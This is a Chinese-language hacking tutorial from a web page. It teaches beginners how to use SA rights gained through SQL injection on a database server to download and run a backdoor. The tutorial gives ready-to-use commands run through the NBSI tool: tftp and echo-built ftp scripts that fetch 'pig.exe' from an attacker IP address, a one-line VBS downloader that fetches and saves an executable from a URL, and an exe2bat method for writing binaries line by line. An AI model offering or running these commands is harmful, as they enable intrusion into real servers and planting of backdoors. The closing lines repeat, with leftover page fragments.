注射中碰到SA的朋友我想应该不在少数吧?但是在上传我们的工具上去可是有一点难题,当然这里只针对菜鸟来说,扫到一个 SA除了建立个帐号,就茫然了。如果碰巧遇到个开了3389的就可以直接上去啦。如果他没开呢?那怎么办呢?没开我们也可以帮他开滴。下面看我找到了一个 SA的点如图1
screen.width-300)this.width=screen.width-300' border='0' alt='Click to Open in New Window'>
看见没有?SA权限。。现在我们想把一个后门传上去。然后用NBSI的执行命令那执行一下,如果WEB服务器和数据库服务器在一块,那上传我们的后门就方便多,找到WEB路径用NBSI自带的上传一句话木马。然后。。这个应该不用说了。如果只是数据库服器呢?又没开终端。我们可以用在SHELL中上传的办法。
(1) TFTP上传
先在本地用tftp32架一TFTP服务器,我已经架设好了,双击, 就开始监听UDP 69端口,如图2
screen.width-300)this.width=screen.width-300' border='0' alt='Click to Open in New Window'>
然后在NBSI的NBCommander执行tftp -i 218.201.49.92 get pig.exe 注意:pig.exe为我们的后门程序。一执行tftp服务器就有反映了。上传完毕了文件在哪呢?在system32下,当然你也可以自定义路径,命令是:tftp -i 218.201.49.92 get pig.exe c:\pig.exe 下载后保存到c盘,然后我们执行就行了.
(2)FTP上传
这个也够简单的,在NBSI执行命令那块输入
echo open 218.201.49.92 >ftp.txt ‘打开FTP
echo pig >>ftp.txt ‘输入用户名
echo pig >>ftp.txt ‘输入密码
echo get pig.exe >>ftp.txt ‘下载pig.exe 默认是下载到system32目录下
echo bye >>ftp.txt ‘byebye,退出FTP
一行一行的输入而不是一次性全部打上去,写好了之后ftp -s:ftp.txt 等一会后门就会下载到目标机器上了如图3
screen.width-300)this.width=screen.width-300' border='0' alt='Click to Open in New Window'>
如果不想下载到system32下面可把第4条语句改一下改为:echo get pig.exe c:\pig.exe >>ftp.txt这样是下载到C盘了,如果遇到echo 执行多次呢,不要紧。反正FTP用户名和密码一样。他执行多次也照样下载。
(3)VBS脚本下载
网上流传的iget.vbs好象用了老是说什么下标界错误?这个我也不明白怎么回事,反正我就是用不了。其实还有另外一个下载脚本是可以用的,为了避免echo 执行多次所以我就采用了只有一行的VBS代码,直接在NBSI执行命令那里输入:
echo Set XPost = CreateObject(^"Microsoft.XMLHTTP^"):xPost.Open ^"GET^",^"http://soft.163vv.com/77169/c.exe^",0:xPost.Send():Set sGet = CreateObject(^"ADODB.Stream^"):sGet.Mode = 3:sGet.Type = 1:sGet.Open():sGet.Write(xPost.responseBody):sGet.SaveToFile ^"c:\c.exe^",2 >pig.vbs
本来这段代码是多行的,我把他整合为一行了。意思是下载http://soft.163vv.com/77169/c.exe然后保存到c:\c.exe
[1] [2]
要用的朋友只需要把里面的网址改为自己的就行了,好我们在NBSI中执行看看,输入cscript pig.vbs 如图4
screen.width-300)this.width=screen.width-300' border='0' alt='Click to Open in New Window'>
呵呵然后用dir c:\看看有没有c.exe这个文件?
(4)EXE2BAT法
将程序转换为2进制度编码然后用Echo命令一行行写入,比较麻烦。而且ECHO不能执行多次,如果执行多次的话写出来的东西都是错的。方法如下,打开exe2bat,输入文件那里选择要转换的程序,建议不要超过150K,输出文件那里就是保存的位置。然后点转换,就行了,如果出错请多转换几次如图5
screen.width-300)this.width=screen.width-300' border='0' alt='Click to Open in New Window'>
好了这时你的C盘下会出现一nc2.bat文件,用记事本打开看看,图6
screen.width-300)this.width=screen.width-300' border='0' alt='Click to Open in New Window'>
就是这些,一行一行的在NBSI那里写入吧,把前面的@echo off 和每行开头的@echo去掉就行了。也可以用xiaolu版的NB,有2进制文件上传的功能,大家可以试下.记得,如果用这个上传的话,你得把其他的 ECHO还有>>等等都去掉只留下2进制编码。图7
screen.width-300)this.width=screen.width-300' border='0' alt='Click to Open in New Window'>
具体怎么样我也不清楚,没试过。注入中上传比较有效果的方法都已经介绍完了,好好利用
(出处:http://www.sheup.com)
[1] [2]
具体怎么样我也不清楚,没试过。注入中上传比较有效果的方法都已经介绍完了,好好利用
(出处:http://www.sheup.com)
[1] [2] [3]